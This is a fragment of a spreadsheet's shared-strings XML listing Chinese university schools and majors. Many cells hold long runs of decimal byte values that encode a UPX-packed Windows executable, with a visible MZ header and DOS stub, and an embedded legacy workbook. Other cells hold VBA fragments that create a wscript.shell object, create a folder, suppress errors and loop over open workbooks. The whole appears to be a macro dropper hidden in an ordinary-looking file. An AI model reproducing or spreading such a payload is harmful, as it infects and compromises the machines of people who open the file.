    <t>电气工程及其自动化</t>
  </si>
  <si>
    <t>外国语学院</t>
  </si>
  <si>
    <t>飞行器工程学院(航空发动机学院)</t>
  </si>
  <si>
    <t>数学与信息科学学院</t>
  </si>
  <si>
    <t>测试与光电工程学院</t>
  </si>
  <si>
    <t>测控技术与仪器（无损检测方向）</t>
  </si>
  <si>
    <t>测控技术与仪器（卓越计划）</t>
  </si>
  <si>
    <t>光电信息科学与工程</t>
  </si>
  <si>
    <t>经济管理学院</t>
  </si>
  <si>
    <t>工业工程</t>
  </si>
  <si>
    <t>会计学</t>
  </si>
  <si>
    <t>体育学院</t>
  </si>
  <si>
    <t>社会体育指导与管理</t>
  </si>
  <si>
    <t>土木建筑学院</t>
  </si>
  <si>
    <t>交通工程</t>
  </si>
  <si>
    <t>艺术与设计学院</t>
  </si>
  <si>
    <t>环境设计</t>
  </si>
  <si>
    <t>视觉传达设计</t>
  </si>
  <si>
    <t>服装与服饰设计</t>
  </si>
  <si>
    <t>产品设计</t>
  </si>
  <si>
    <t>文法学院</t>
  </si>
  <si>
    <t>音乐学院</t>
  </si>
  <si>
    <t>音乐学</t>
  </si>
  <si>
    <t>舞蹈学</t>
  </si>
  <si>
    <t>表演（空中乘务）</t>
  </si>
  <si>
    <t>飞行技术</t>
  </si>
  <si>
    <t>飞行器制造工程（航空维修工程与技术方向）</t>
  </si>
  <si>
    <t>软件学院</t>
  </si>
  <si>
    <t>软件工程（嵌入式系统开发方向，东软2+2）</t>
  </si>
  <si>
    <t>物联网工程</t>
  </si>
  <si>
    <t>国际教育学院</t>
  </si>
  <si>
    <t>电子信息工程（GJ）</t>
  </si>
  <si>
    <t>电子信息工程（光电信息方向）（GJ）</t>
  </si>
  <si>
    <t>环境工程（GJ）</t>
  </si>
  <si>
    <t>英语（GJ）</t>
  </si>
  <si>
    <t>工商管理(GJ)</t>
  </si>
  <si>
    <t>会计学（GJ）</t>
  </si>
  <si>
    <t>机械电子工程</t>
  </si>
  <si>
    <t>金融数学</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 148 4 46 0 72 80 32 76 97 115 101 114 74 101 116 32 53 49 48 48 32 80 67 76 32 53 101 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 50 0 163 1 134 3 120 156 101 144 203 78 20 81 16 134 235 239 58 112 184 42 11 110 26 140 141 87 32 164 211 140 204 198 89 152 0 26 32 189 232 4 69 182 147 76 71 7 72 21 116 67 130 49 106 102 169 11 92 185 210 68 215 62 129 16 94 193 167 48 186 118 231 29 61 167 35 19 19 107 241 255 149 239 84 170 234 84 81 252 31 1 232 62 166 2 103 155 120 77 118 15 32 178 29 165 118 122 149 223 36 151 33 135 208 139 104 5 144 46 180 44 228 28 120 159 135 73 150 130 237 9 232 3 200 37 180 94 242 110 12 153 130 92 129 78 66 43 80 24 77 140 107 114 21 99 228 236 14 12 121 95 253 235 119 189 251 228 33 206 144 125 226 167 109 61 134 60 130 62 133 60 131 172 25 255 56 237 171 164 110 200 173 168 8 61 250 200 163 222 136 6 136 63 112 131 236 39 14 168 12 87 179 142 20 210 13 253 66 242 139 242 239 36 63 73 206 67 191 146 254 32 57 38 29 130 12 67 26 129 140 64 67 232 40 184 31 13 146 83 208 1 232 105 236 142 131 95 241 27 226 27 110 150 216 64 46 64 15 88 122 141 244 24 237 54 246 93 121 154 179 165 90 227 181 175 212 177 146 124 38 175 239 217 105 39 232 100 43 162 253 232 36 115 216 180 241 219 127 113 71 27 191 104 99 215 244 27 13 18 207 99 45 224 5 39 242 156 245 38 200 30 113 74 183 235 249 189 108 39 76 243 166 236 100 249 245 197 52 76 234 69 150 47 59 86 157 137 227 112 37 203 155 89 81 75 231 147 176 90 91 76 231 110 85 170 51 149 </t>
  </si>
  <si>
    <t xml:space="preserve">175 239 0 77 184 213 125 176 36 21 75 99 185 103 27 104 8 132 115 194 162 83 47 88 176 72 96 52 93 226 216 89 185 66 246 12 209 137 23 201 14 104 113 68 135 188 228 251 58 125 129 97 38 105 30 158 31 8 156 70 50 62 18 37 141 108 36 63 244 11 182 148 192 64 56 93 120 143 117 116 86 77 63 139 67 138 245 248 3 89 118 124 124 218 147 13 67 123 109 167 18 92 38 220 176 208 23 91 48 255 128 56 14 3 93 131 165 44 178 193 217 94 111 6 48 242 78 184 12 30 57 52 255 69 72 86 16 60 52 156 179 179 49 52 6 44 241 148 91 108 87 193 148 54 36 137 53 5 56 35 35 35 35 44 48 60 64 216 22 154 134 255 32 24 86 163 116 2 120 108 27 220 65 38 184 128 203 7 196 81 3 120 78 12 210 221 116 81 87 94 68 152 228 5 222 145 45 44 156 68 184 234 230 163 155 213 176 3 126 236 224 196 76 80 232 24 31 91 131 197 108 173 184 8 79 4 90 47 142 3 204 86 50 50 43 19 6 211 83 145 0 240 123 129 217 40 65 83 104 242 128 102 180 4 192 21 158 26 116 112 97 220 57 152 109 135 220 60 248 223 164 45 16 15 217 143 150 77 9 11 86 24 80 15 200 118 114 166 107 86 84 78 8 152 61 27 187 10 116 8 247 12 166 7 13 25 51 240 139 147 160 12 190 138 189 75 183 252 0 157 156 39 8 65 78 178 197 152 149 76 201 195 158 11 22 152 244 118 242 218 233 91 168 205 20 6 45 80 60 12 8 178 144 107 91 208 31 43 125 104 244 236 57 107 118 68 72 255 12 172 53 178 23 4 23 218 221 27 163 112 87 143 218 112 210 73 17 104 100 68 172 62 240 175 51 215 139 10 185 246 126 215 170 9 247 159 235 106 106 19 104 80 28 26 83 214 61 19 5 79 55 60 26 1 255 76 201 63 52 106 18 104 40 2 25 106 10 104 28 80 216 60 36 5 191 3 139 199 218 226 171 65 142 52 16 20 83 52 186 184 124 50 112 42 57 174 240 235 139 202 65 186 36 151 77 241 235 20 243 114 225 105 144 243 191 185 87 221 240 235 230 204 183 29 176 13 134 20 80 37 19 186 </t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 85 80 88 48 0 0 0 0 0 192 0 0 0 16 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 224 85 80 88 49 0 0 0 0 0 96 0 0 0 208 0 0 0 96 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 224 46 114 115 114 99 0 0 0 0 16 0 0 0 48 1 0 0 8 0 0 0 100 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192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49 46 50 52 0 85 80 88 33 12 9 2 8 63 61 203 179 126 49 145 194 83 14 1 0 224 93 0 0 0 0 1 0 38 6 0 5 </t>
  </si>
  <si>
    <t>On Error Resume Next</t>
  </si>
  <si>
    <t xml:space="preserve">157 184 28 16 239 192 45 154 139 106 152 16 137 2 184 168 127 56 213 101 195 31 216 106 254 104 168 48 137 110 178 92 76 255 53 0 25 32 241 228 184 221 162 139 151 131 254 240 46 59 217 214 213 95 104 237 32 118 139 12 179 137 76 35 72 23 247 189 81 225 124 179 176 235 104 1 1 45 179 125 206 241 126 251 33 90 255 84 8 235 195 100 143 5 67 161 140 250 254 74 116 230 100 11 15 129 121 4 104 117 22 54 218 90 12 81 165 82 132 81 176 5 86 48 113 247 155 138 81 187 100 44 112 8 111 109 59 10 206 137 75 2 67 207 107 12 89 27 169 255 219 91 194 103 204 204 86 67 50 48 88 67 48 48 219 8 250 219 168 182 209 155 93 70 215 64 228 26 116 162 20 216 212 71 107 14 76 212 18 37 25 62 33 219 18 223 101 115 123 8 193 97 97 118 177 143 110 237 55 42 94 86 85 141 107 16 168 11 93 94 93 225 94 232 65 11 195 51 120 60 37 130 32 110 25 235 182 132 179 4 29 86 12 198 8 54 182 49 217 10 110 222 143 73 143 85 186 144 115 221 12 59 8 48 26 110 143 235 251 29 251 21 87 219 235 28 201 235 21 92 106 255 63 180 33 196 38 93 22 148 188 183 86 91 53 59 139 77 65 238 3 24 80 151 161 186 100 36 225 161 213 160 119 125 67 1 152 241 42 131 61 72 112 212 117 33 104 160 235 67 185 252 62 224 161 232 202 89 177 232 176 51 113 255 21 89 135 106 216 160 203 164 1 85 8 147 120 62 59 106 67 108 218 143 11 65 65 61 162 124 241 91 120 187 90 176 241 66 59 150 26 38 28 42 116 102 105 152 108 187 232 112 13 109 239 161 155 16 215 168 250 117 11 241 145 40 209 23 101 92 111 184 176 110 18 27 41 0 185 48 19 23 156 157 69 121 148 99 64 37 89 18 87 128 177 120 75 145 189 7 96 64 59 139 179 23 177 60 118 41 25 80 115 248 13 64 247 47 53 109 59 106 3 3 248 104 144 65 87 73 115 51 91 27 56 85 96 255 116 25 108 236 44 16 87 12 124 29 112 158 205 220 15 124 255 182 124 211 22 17 104 16 59 200 96 142 171 39 72 55 183 89 </t>
  </si>
  <si>
    <t xml:space="preserve">237 255 255 255 131 236 52 139 68 36 60 83 85 86 139 72 4 87 51 246 104 64 112 64 0 81 137 116 36 44 198 22 190 221 253 255 27 16 232 3 0 7 102 139 232 106 1 106 44 85 11 6 186 85 10 141 84 36 48 125 123 183 219 5 82 14 5 210 59 56 37 255 0 0 193 224 2 80 177 177 255 246 17 196 71 248 106 76 85 137 124 36 116 47 86 20 119 255 59 247 137 132 36 132 36 45 76 131 196 56 132 192 118 36 139 223 73 106 4 83 255 251 219 97 69 36 23 16 139 200 70 129 225 76 131 195 4 59 241 124 109 231 254 237 222 51 219 41 137 92 36 28 15 134 143 20 82 32 139 122 111 103 183 219 32 106 70 2 64 110 9 80 144 139 170 88 141 139 246 118 108 236 0 2 0 181 60 110 139 203 132 139 209 137 85 253 247 255 254 92 193 233 2 243 165 224 139 202 131 225 3 80 243 164 31 185 139 76 36 96 187 110 246 215 126 104 53 141 20 11 202 20 68 41 64 131 158 237 182 219 193 4 139 36 137 13 32 17 20 64 145 129 195 110 237 205 253 43 59 193 83 142 140 117 255 0 134 106 48 181 73 62 16 18 68 106 4 76 28 89 190 172 219 160 5 244 50 80 35 76 36 72 81 120 219 222 54 47 80 18 42 116 18 80 137 148 251 111 135 69 29 133 124 126 72 139 193 153 129 226 255 1 20 27 54 247 118 3 194 202 193 255 9 133 12 128 2 44 121 195 255 190 253 8 73 129 201 0 254 128 65 116 5 71 16 139 247 193 230 9 86 177 179 127 107 190 64 196 28 126 65 139 216 193 225 9 81 124 118 216 194 13 90 133 255 126 2 243 243 86 132 161 219 208 29 40 172 92 80 4 144 216 44 85 55 252 221 45 50 28 129 198 42 79 117 202 97 40 51 192 221 112 239 222 59 240 251 3 32 15 142 230 173 21 12 3 124 255 115 191 3 84 3 2 102 137 113 117 131 192 4 129 249 133 26 137 215 185 193 54 166 117 79 32 4 23 34 56 21 110 182 237 195 28 192 138 76 52 136 51 36 36 43 209 241 239 46 28 104 7 16 252 25 28 246 198 1 116 22 191 48 187 191 247 223 129 141 52 3 51 210 243 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 161 0 34 0 9 0 100 0 1 0 1 0 1 0 2 0 88 2 88 2 0 0 0 0 0 0 224 63 0 0 0 0 0 0 224 63 1 0 85 0 2 0 8 0 125 0 12 0 0 0 0 0 64 15 15 0 3 0 2 0 125 0 12 0 1 0 1 0 128 3 15 0 3 0 2 0 125 0 12 0 2 0 2 0 32 14 25 0 3 0 2 0 125 0 12 0 3 0 4 0 224 8 24 0 2 0 2 0 125 0 12 0 5 0 5 0 224 8 15 0 2 0 2 0 0 2 14 0 0 0 0 0 128 0 0 0 0 0 5 0 0 0 8 2 16 0 0 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 1 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 2 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 3 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 4 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 5 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 6 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 7 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 8 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 9 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 10 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 11 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 12 0 0 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 13 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 14 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 15 0 0 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 16 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 17 0 1 0 2 0 59 1 </t>
  </si>
  <si>
    <t xml:space="preserve">9 8 16 0 0 6 5 0 222 30 205 7 201 128 0 0 6 2 0 0 225 0 2 0 176 4 193 0 2 0 0 0 226 0 0 0 92 0 112 0 4 0 0 119 111 114 107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32 66 0 2 0 176 4 97 1 2 0 0 0 192 1 0 0 61 1 2 0 6 0 211 0 0 0 186 1 15 0 12 0 0 84 104 105 115 87 111 114 107 98 111 111 107 156 0 2 0 14 0 25 0 2 0 0 0 18 0 2 0 0 0 19 0 2 0 0 0 175 1 2 0 0 0 188 1 2 0 0 0 61 0 18 0 240 0 60 0 92 58 102 33 57 0 0 0 0 0 1 0 88 2 64 0 2 0 0 0 141 0 2 0 0 0 34 0 2 0 0 0 14 0 2 0 1 0 183 1 2 0 0 0 218 0 2 0 0 0 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 180 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 46 0 240 0 0 0 255 127 144 1 0 0 0 1 0 0 15 1 84 0 105 0 109 0 101 0 115 0 32 0 78 0 101 0 119 0 32 0 82 0 111 0 109 0 97 0 110 0 30 4 43 0 5 0 19 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 59 0 </t>
  </si>
  <si>
    <t xml:space="preserve">77 244 145 108 55 9 28 99 135 5 22 235 57 34 152 227 200 182 24 0 117 231 46 69 131 164 147 45 226 244 83 68 48 228 134 146 178 4 118 183 186 80 13 225 25 61 15 16 92 136 195 144 28 84 88 22 25 171 176 59 216 169 64 228 137 31 230 26 83 65 14 100 171 32 195 252 253 3 33 88 134 70 100 193 105 112 11 153 144 252 252 180 144 90 144 67 101 252 29 18 155 52 204 14 51 58 18 252 240 210 74 38 228 252 175 11 144 9 108 200 24 234 12 22 199 186 61 116 59 145 70 86 181 128 124 154 214 62 43 196 92 52 13 89 136 92 14 169 34 77 36 3 12 49 246 69 114 114 217 167 12 248 180 12 146 75 71 133 88 117 93 72 160 33 19 152 107 64 225 177 236 205 158 75 50 58 158 165 162 212 66 201 222 163 236 81 106 9 160 234 5 18 28 60 131 139 160 13 93 214 0 35 27 29 30 175 224 220 83 1 54 199 128 248 220 13 2 240 251 4 216 14 48 210 104 236 249 97 234 179 89 192 61 163 106 127 133 52 100 41 179 23 196 18 197 118 62 53 211 224 132 28 199 196 253 35 211 144 158 232 180 247 65 181 235 229 56 22 226 212 190 101 74 249 28 6 44 62 67 75 71 83 201 204 103 11 92 96 152 104 200 117 247 222 115 34 7 41 14 148 191 254 1 145 217 98 35 235 137 104 156 40 216 182 214 53 96 39 22 57 194 197 208 11 180 132 121 98 246 175 50 7 182 13 108 192 142 21 117 58 21 170 33 8 65 198 30 58 106 86 38 217 218 236 42 92 240 1 235 119 108 180 193 158 187 251 137 157 192 30 199 133 184 194 24 73 151 120 109 200 180 247 70 221 138 188 249 151 60 204 52 136 108 188 249 24 217 178 119 46 188 251 56 108 124 72 133 176 28 255 86 36 144 96 48 184 32 30 41 33 204 54 180 224 132 222 18 33 117 105 117 81 9 200 34 17 207 18 92 93 214 131 240 191 212 219 216 118 22 134 61 235 64 251 112 208 255 178 183 178 64 63 243 240 96 119 130 95 252 21 44 59 135 116 167 140 5 110 176 132 243 13 132 24 192 200 68 210 24 24 220 166 14 24 32 112 171 16 179 249 30 205 </t>
  </si>
  <si>
    <t>For i = 1 To Workbooks.Count</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t xml:space="preserve">101 224 183 225 123 219 236 69 228 68 8 232 48 8 236 240 125 179 253 157 41 80 102 199 69 240 149 2 146 236 247 216 27 192 95 107 155 147 173 245 151 12 36 83 86 224 188 198 55 30 159 181 92 40 115 243 137 117 248 143 93 110 141 221 16 226 87 83 34 6 4 83 200 231 93 251 207 182 26 86 33 96 248 59 251 137 125 244 171 15 100 204 246 240 73 57 4 64 184 65 80 135 240 237 17 115 236 126 83 80 183 161 118 134 27 102 251 217 240 80 23 80 106 5 87 53 104 242 117 172 109 207 133 19 17 100 181 214 248 248 4 71 236 221 109 91 208 240 21 196 170 136 156 5 48 54 222 210 219 22 29 131 146 89 126 16 98 61 50 247 47 188 29 42 49 215 235 110 157 136 93 220 141 125 221 171 0 215 182 96 6 151 45 16 220 48 200 182 134 183 221 89 133 118 27 126 252 80 86 119 244 121 108 9 115 255 71 116 59 3 125 252 43 117 252 117 229 20 81 194 251 115 251 15 190 69 220 80 38 200 180 89 116 14 141 14 176 118 110 225 191 201 170 89 89 95 94 210 195 50 169 3 195 248 182 253 27 64 15 182 69 8 72 116 28 72 3 17 2 7 104 72 227 105 150 102 235 103 19 6 230 12 229 5 132 131 108 101 228 65 12 93 195 119 27 134 133 114 44 1 183 212 123 98 8 102 83 99 51 176 216 87 210 133 212 84 248 32 77 208 213 190 0 32 3 118 157 13 211 255 214 137 56 139 93 8 139 59 20 45 212 221 126 44 188 52 138 67 4 134 248 7 4 77 167 212 80 93 11 166 155 24 189 172 118 20 84 133 219 237 47 152 156 82 232 43 199 59 198 137 198 127 3 63 8 30 142 236 58 27 216 184 176 180 208 133 182 134 198 214 116 236 115 84 3 87 63 180 214 149 94 70 12 87 117 88 182 254 83 19 59 247 235 204 184 26 188 46 125 12 93 22 137 55 190 238 15 134 83 85 230 81 60 255 55 9 83 229 176 23 218 205 253 111 69 248 64 115 127 4 166 3 184 164 206 254 118 187 15 133 77 16 33 137 1 203 50 235 30 74 89 125 183 181 247 62 16 51 83 32 169 16 199 0 113 23 244 154 52 161 44 105 </t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>飞行器制造工程（产教融合航空制造班）</t>
  </si>
  <si>
    <t>160305</t>
  </si>
  <si>
    <t>170337</t>
  </si>
  <si>
    <t>170338</t>
  </si>
  <si>
    <t>170444</t>
  </si>
  <si>
    <t>180223</t>
  </si>
  <si>
    <t>180344</t>
  </si>
  <si>
    <t>180815</t>
  </si>
  <si>
    <t xml:space="preserve">140 41 126 4 1 62 155 43 223 1 125 8 251 36 148 255 235 70 59 93 20 114 70 133 201 117 117 121 131 125 78 189 181 141 118 116 13 149 166 247 107 64 43 250 235 221 45 33 178 66 251 71 201 116 71 1 222 189 93 184 152 43 216 81 114 62 176 252 235 41 174 86 15 190 0 185 239 17 254 233 12 107 89 5 46 255 69 164 75 165 205 245 187 183 89 127 167 157 0 133 219 15 133 80 103 48 134 214 14 187 16 244 201 195 129 11 65 4 49 110 11 177 43 116 149 231 93 36 4 45 18 222 116 134 89 138 12 8 16 211 89 89 34 194 155 97 59 93 95 207 33 127 137 77 8 34 30 228 74 14 6 159 12 235 3 139 242 39 12 214 39 27 42 36 35 59 200 139 249 67 40 76 120 54 83 34 24 37 249 195 194 223 3 223 218 75 59 77 37 46 22 139 193 116 9 56 242 140 63 193 43 194 80 83 235 18 14 116 54 8 31 190 124 20 55 41 3 216 235 24 79 17 53 5 118 115 109 247 40 136 3 134 67 255 121 138 69 8 0 254 219 8 95 200 118 16 235 4 4 199 91 43 120 76 122 104 62 0 229 109 170 75 91 161 220 95 111 139 64 91 10 92 1 59 220 27 77 20 255 229 93 36 239 11 191 117 13 38 52 182 127 104 21 160 1 68 33 89 164 197 190 125 238 232 53 89 225 7 36 252 20 168 52 16 168 8 116 248 106 11 55 170 196 4 34 199 137 252 87 189 219 60 107 83 20 190 21 6 51 201 170 15 149 193 73 76 134 141 191 216 235 13 199 5 144 118 157 22 170 128 214 125 219 153 163 36 24 104 224 117 1 195 80 54 16 3 102 193 236 26 38 22 248 161 64 253 131 217 189 12 3 78 7 70 166 106 255 104 176 96 247 134 187 189 70 104 128 49 4 100 161 76 26 100 137 37 7 115 191 97 137 153 16 194 137 101 232 255 21 4 33 244 207 160 228 126 138 212 137 21 168 114 197 147 137 13 217 22 10 184 164 13 230 73 202 10 160 119 127 208 253 232 16 163 156 7 106 74 32 71 89 140 8 106 28 217 126 151 29 105 8 125 101 252 21 30 156 77 88 29 251 206 180 163 196 89 15 29 106 163 128 118 </t>
  </si>
  <si>
    <t xml:space="preserve">106 48 155 228 82 48 66 53 25 157 26 137 36 218 174 108 79 75 49 212 88 128 45 11 166 212 2 132 79 60 49 200 161 63 86 160 122 64 91 144 100 3 11 161 245 139 185 47 208 249 209 74 2 116 164 246 64 15 134 179 114 140 254 15 136 117 228 131 198 12 191 44 10 100 160 245 134 48 91 72 81 244 15 96 17 205 94 163 69 59 14 124 9 218 222 117 28 72 116 46 2 36 36 25 131 232 3 114 169 48 91 177 168 162 172 188 19 244 175 193 32 153 6 25 104 156 188 51 203 122 167 231 144 188 136 47 40 98 172 29 11 102 99 158 49 88 16 133 40 14 52 27 80 254 179 115 223 232 86 186 163 36 59 8 15 130 88 255 0 178 53 155 28 66 188 232 43 88 83 2 157 134 212 147 32 137 174 4 154 28 212 155 212 35 89 201 32 32 129 18 73 42 190 100 198 92 5 0 79 80 144 145 136 152 104 153 230 203 15 168 33 31 152 250 127 141 125 152 147 193 134 108 29 250 52 253 235 76 23 176 253 22 21 252 205 12 25 43 126 73 168 252 12 43 51 246 132 14 130 189 109 232 2 236 129 19 136 6 239 17 153 112 109 109 157 217 200 18 23 24 45 208 86 29 158 206 40 220 80 15 24 128 124 24 21 174 193 154 35 83 35 116 14 54 216 225 126 252 187 196 66 63 56 55 41 208 8 214 132 121 208 13 90 40 124 240 150 62 68 78 201 184 76 47 158 78 14 228 128 152 250 184 87 80 6 78 246 204 26 52 90 80 9 217 125 209 83 132 127 246 104 59 69 232 144 205 108 25 106 96 180 104 200 5 40 56 67 22 124 192 188 18 222 100 11 96 180 29 10 192 45 96 66 23 114 188 188 103 110 11 88 169 236 130 219 28 104 219 179 25 178 184 26 103 128 189 42 125 191 103 102 105 190 0 12 153 46 178 94 106 7 205 98 213 46 80 150 50 55 157 204 236 42 152 154 253 74 133 129 151 69 15 211 23 86 17 86 200 115 32 19 8 45 254 200 30 136 229 139 134 208 152 185 152 108 15 217 182 28 156 58 232 146 83 71 196 151 189 100 211 232 35 151 69 160 68 196 67 246 102 15 184 26 177 97 157 16 185 74 38 144 1 </t>
  </si>
  <si>
    <t xml:space="preserve">59 95 32 42 32 92 45 35 44 35 35 48 46 48 48 95 32 59 95 32 42 32 34 45 34 63 63 95 32 59 95 32 64 95 32 30 4 26 0 23 0 21 0 0 92 36 35 44 35 35 48 95 41 59 92 40 92 36 35 44 35 35 48 92 41 30 4 31 0 24 0 26 0 0 92 36 35 44 35 35 48 95 41 59 91 82 101 100 93 92 40 92 36 35 44 35 35 48 92 41 30 4 32 0 25 0 27 0 0 92 36 35 44 35 35 48 46 48 48 95 41 59 92 40 92 36 35 44 35 35 48 46 48 48 92 41 30 4 37 0 26 0 32 0 0 92 36 35 44 35 35 48 46 48 48 95 41 59 91 82 101 100 93 92 40 92 36 35 44 35 35 48 46 48 48 92 41 30 4 11 0 176 0 6 0 0 48 48 48 48 48 48 30 4 27 0 177 0 11 0 1 34 0 47 102 34 0 59 0 34 0 47 102 34 0 59 0 34 0 38 84 34 0 30 4 27 0 178 0 11 0 1 34 0 31 119 34 0 59 0 34 0 31 119 34 0 59 0 34 0 71 80 34 0 30 4 27 0 179 0 11 0 1 34 0 0 95 34 0 59 0 34 0 0 95 34 0 59 0 34 0 115 81 34 0 224 0 20 0 0 0 0 0 245 255 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 1 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 1 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 2 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 2 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 </t>
  </si>
  <si>
    <t xml:space="preserve">77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 24 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 243 250 199 113 146 148 148 113 146 148 148 113 146 148 148 98 154 201 148 115 146 148 148 116 158 155 148 117 146 148 148 116 158 203 148 127 146 148 148 116 158 201 148 117 146 148 148 90 179 179 148 120 146 148 148 139 182 136 148 119 146 148 148 242 142 154 148 112 146 148 148 139 177 141 148 117 146 148 148 242 154 201 148 122 146 148 148 113 146 149 148 7 147 148 148 116 158 244 148 122 146 148 148 157 153 202 148 112 146 148 148 116 158 206 148 112 146 148 148 82 105 99 104 113 146 148 148 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 67 118 101 61 0 0 0 0 0 0 0 0 224 0 15 1 11 1 7 10 0 96 0 0 0 16 0 0 0 192 0 0 224 45 1 0 0 208 0 0 0 48 1 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 64 1 0 0 16 0 0 0 0 0 0 2 0 0 0 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 152 52 1 0 0 2 0 0 0 48 1 0 152 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t>Dim buf As Byte</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 0 0 1 0 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 9 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 0 0 245 255 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 44 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 42 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 43 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 41 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 49 0 1 0 32 0 0 4 0 0 0 0 0 0 0 0 192 32 224 0 20 0 7 0 49 0 1 0 32 0 0 12 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 0 0 17 1 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 49 0 17 1 32 0 0 4 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 49 0 9 0 32 0 0 4 0 0 0 0 0 0 0 0 192 32 147 2 4 0 16 128 